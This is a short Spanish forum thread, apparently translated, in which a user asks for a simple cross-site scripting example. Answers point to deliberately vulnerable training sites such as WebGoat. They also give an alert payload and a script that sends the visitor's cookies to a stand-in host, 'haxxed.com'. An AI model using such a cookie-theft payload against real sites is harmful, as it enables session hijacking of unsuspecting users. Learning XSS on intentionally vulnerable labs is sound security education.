xss - site_scripting - Un ejemplo simple de un ataque de scripting entre sitios

xss cheat sheet (4)

¿Alguien puede mostrarme un ataque de scripting entre sitios en efecto en mi navegador? ¿Hay algún ejemplo en internet que haga esto? No he encontrado esto en internet.

Cuanto más simple es el ejemplo, mejor.

El formulario simple también sería: si aparece el cuadro de mensaje, ya sabe, que la página o el servidor es vulnerable.

<script>window.location = ''haxxed.com? cookie='' + document.cookie</script>

Una gran muestra de cómo funciona la técnica se puede encontrar aquí https://www.hacksplaining.com/exercises/xss-stored

En general, tendrá que instalar su propio software del lado del servidor para un ejemplo de XSS en vivo. No muchos sitios legítimos abrirán un error XSS intencionalmente a los internautas.

Una pieza preparada del software del lado del servidor que le permite demostrar XSS (entre muchas otras cosas) a usted mismo es WebGoat de OWASP. Aquí hay instrucciones para instalar WebGoat y demostrar XSS . Encontrará ejemplos adicionales de fragmentos de programas que permiten XSS en el artículo de OWASP " Cross-site scripting (XSS) ".

Ver http://www.insecurelabs.org y http://www.insecurelabs.org/task/

Intencionalmente vulnerable a XSS en el campo de búsqueda y en muchos otros lugares.

<img src="javascript:alert(''hello everybody'')"></img> La etiqueta de imagen que inserté es un ejemplo de xss. el src anterior contiene el script java que te alerta.